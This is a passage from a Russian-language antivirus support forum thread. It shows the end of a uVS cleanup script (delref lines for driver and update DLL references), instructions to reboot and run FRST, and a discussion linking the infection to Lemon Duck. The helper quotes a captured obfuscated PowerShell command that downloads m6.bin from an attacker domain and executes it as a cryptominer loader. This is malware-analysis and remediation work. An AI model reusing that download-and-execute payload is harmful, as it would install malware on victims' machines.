delref %Sys32%\DRIVERS\EW_JUCDCACM.SYS
delref %Sys32%\DRIVERS\EW_JUBUSENUM.SYS
delref %Sys32%\DRIVERS\EW_CDCACM.SYS
delref %Sys32%\DRIVERS\EW_WWANECM.SYS
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref IRENUM\[SERVICE]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.41\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.99\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.82\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.93\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.32\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.72\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.143.57\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.145.49\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.63\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.11\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.452\PSMACHINE_64.DLL
delref %Sys32%\TETHERINGSETTINGHANDLER.DLL
delref %Sys32%\QUICKACTIONSPS.DLL
delref %Sys32%\VAILAUDIOPROXY.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.49\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.133.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO360.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.41\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.99\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE
delref %SystemRoot%\SYSWOW64\TAPILUA.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.82\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\UPDATEDEPLOYMENTPROVIDER.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.93\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMDHWDECODER_32.DLL
delref %SystemRoot%\SYSWOW64\LOCATIONFRAMEWORK.DLL
delref %SystemRoot%\SYSWOW64\MAPSBTSVCPROXY.DLL
delref D:\CHECKVER.OCX
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.32\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.72\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\COMPPKGSRV.EXE
delref %SystemRoot%\SYSWOW64\EAPPCFGUI.DLL
delref D:\DRIVERCDHTML.OCX
delref %SystemRoot%\SYSWOW64\AUTHHOSTPROXY.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.143.57\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMDH265ENC32.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\NVENCMFTH264.DLL
delref %SystemRoot%\SYSWOW64\WPCREFRESHTASK.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMF-MFT-MJPEG-DECODER32.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.145.49\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\NVDECMFTMJPEG.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\RMSROAMINGSECURITY.DLL
delref %SystemRoot%\SYSWOW64\SYSTEMSETTINGSBROKER.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.63\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.452\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SAPI_EXTENSIONS.DLL
delref %SystemRoot%\SYSWOW64\SMARTSCREEN.EXE
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMDH264ENC32.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.49\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.133.5\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\IDLISTEN.DLL
delref %SystemRoot%\SYSWOW64\WIFICONFIGSP.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\SYSTEM\OLE DB\MSDAORA.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\WIREDNETWORKCSP.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE.DLL
delref D:\AUTORUN.EXE
delref I:\HISUITEDOWNLOADER.EXE
delref D:\HISUITEDOWNLOADER.EXE
delref D:\STARTME.EXE
delref H:\HISUITEDOWNLOADER.EXE
delref %SystemDrive%\USERS\ALEX\APPDATA\LOCAL\ESET\ESETONLINESCANNE­R\ESETONLINESCANNER.EXE
delref G:\ГАРРИ\SYSTEM\HP.EXE
delref G:\ГАРРИ\UNINST.EXE
;-------------------------------------------------------------

restart
[/code]
перезагрузка, пишем о старых и новых проблемах.
------------
далее,

[B]сделайте проверку в FRST[/B]
http://forum.esetnod32.ru/forum9/topic2798/

добавьте лог выполнения скрипта
это может быть файл в таком виде в папке, откуда вы запускали uVS
2021-08-12_19-22-04_log.txt
+
если проблема актуальна,
пробуйте откатить систему на ближайшую свежую точку точку восстановления. (до даты применения скрипта)

[QUOTE]RP55 RP55 написал:
+
[URL=https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html]https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html[/URL] [/QUOTE]

здесь [B]RP55[/B], скорее прав,
что атака была и с этой стороны, судя по тому, что в одном из апрельских образов (на другом почт сервере), запускался такой скрипт.

[code]"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97asd123';$ifp=$env:tmp+'\m6.bin';$down_url='хттп://[B]d.hwqloan.com[/B]';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&VMCTFH-MAIL^^^&36780342-A764-974C-DAE2-ACFBD65CC3C0^^^&00:50:56:83:FF:5F');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|CzdpTG6VH1.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe [/code]
но там после уст патчей все затихло сразу. те данная атака прекратилась.

(хотя и не факт, что именно они сейчас запускают майнер)